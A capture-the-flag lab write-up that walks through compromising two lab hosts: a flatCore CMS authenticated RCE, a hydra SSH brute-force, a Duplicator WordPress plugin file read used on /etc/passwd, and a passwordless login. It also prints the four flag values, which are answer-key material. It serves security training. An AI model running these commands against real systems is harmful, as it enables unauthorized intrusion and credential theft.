Penetration Testing Exploitation CTF 1

Overview¶

This lab focuses on identifying and exploiting vulnerabilities across two target Linux machines. The goal is to analyze web applications and services running on these machines to uncover weaknesses and exploit them to retrieve critical flags. The tasks involve leveraging known credentials, insecure configurations, and vulnerable plugins to compromise systems and access sensitive data.

Target Machines¶

target1.ine.local
target2.ine.local

Flags to Capture¶

Flag 1: Exploit the vulnerable web application on target1.ine.local and retrieve the flag from the root directory.
Hint: Credentials admin:password1 may be useful.
Flag 2: Compromise an insecure system user on target1.ine.local.
Flag 3: Exploit a vulnerable plugin in the web application on target2.ine.local and retrieve flag3.txt from the root directory.
Flag 4: Compromise a system user on target2.ine.local that requires no authentication.

Useful Wordlists¶

/usr/share/nmap/nselib/data/wp-plugins.lst
/usr/share/metasploit-framework/data/wordlists/unix_passwords.txt

Writeup¶

Flag 1: Exploiting the Web Application on target1.ine.local¶

Step 1: Initial Enumeration¶

We start with an Nmap scan to identify open ports and services:

nmap -p- target1.ine.local --min-rate=10000

Findings: - Ports open: 22 (SSH), 80 (HTTP)

A deeper scan reveals: - Apache 2.4.41 running on port 80. - flatCore CMS is being used. - robots.txt contains disallowed directories (/acp/, /core/, /lib/, /modules/).

Step 2: Identifying the CMS Version¶

By visiting http://target1.ine.local/styles/default/info.xml, we find:

<theme>
   <name>defaultTheme</name>
   <version>1.5</version>
   <license>GNU General Public License</license>
   <author>flatCore Dev Team</author>
</theme>

Step 3: Searching for Exploits¶

Using searchsploit, we find an authenticated RCE exploit:

searchsploit flatcore

- Exploit Used: FlatCore CMS 2.0.7 - Remote Code Execution (Authenticated)

Step 4: Exploiting the CMS¶

Using the provided credentials (admin:password1), we execute the exploit:

python3 exploit.py http://target1.ine.local admin password1

- We gain a limited shell as www-data. - We locate Flag 1 in /flag1.txt.

Flag 1

c76022ae98b84572aee18542fe8ca614

Flag 2: Compromising a Weak User on target1.ine.local¶

Step 1: Enumerating Users¶

From the shell, we check /etc/passwd:

cat /etc/passwd

- We find a weak user: iamaweakuser.

Step 2: Bruteforcing SSH Credentials¶

Using hydra, we brute-force the password:

hydra -l iamaweakuser -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt ssh://target1.ine.local

- Password found: angel

Step 3: Retrieving Flag 2¶

Logging in via SSH:

ssh iamaweakuser@target1.ine.local

- Flag 2 is found in /home/iamaweakuser/flag2.txt.

Flag 2

28f059b2ddaa4ca8a80b202a569fa721

Flag 3: Exploiting a Vulnerable Plugin on target2.ine.local¶

Step 1: Initial Nmap Scan¶

nmap -p- target2.ine.local --min-rate=10000

- Open ports: 22 (SSH), 80 (HTTP)

A deeper scan reveals: - WordPress 6.1 running on port 80.

Step 2: Enumerating WordPress Plugins¶

Using Nmap’s WordPress enumeration script:

nmap -p80 target2.ine.local --script=http-wordpress-enum --script-args search-limit=all

- Vulnerable plugin found: Duplicator 1.3.26.

Step 3: Exploiting Arbitrary File Read¶

Using an exploit for Duplicator 1.3.26:

python3 exploit.py http://target2.ine.local /flag3.txt

- Flag 3 is retrieved.

Flag 3

d82e7c95c19f45ba931d834eac0f29d7

Flag 4: Compromising a No-Auth User on target2.ine.local¶

Step 1: Finding System Users¶

Using the same exploit, we read /etc/passwd:

python3 exploit.py http://target2.ine.local /etc/passwd

- User found: iamacrazyfreeuser.

The user allows passwordless login (any password works):

ssh iamacrazyfreeuser@target2.ine.local

- Flag 4 is in /home/iamacrazyfreeuser/flag4.txt.

Flag 4

144cf9ee29a74b53925b35b617cffde4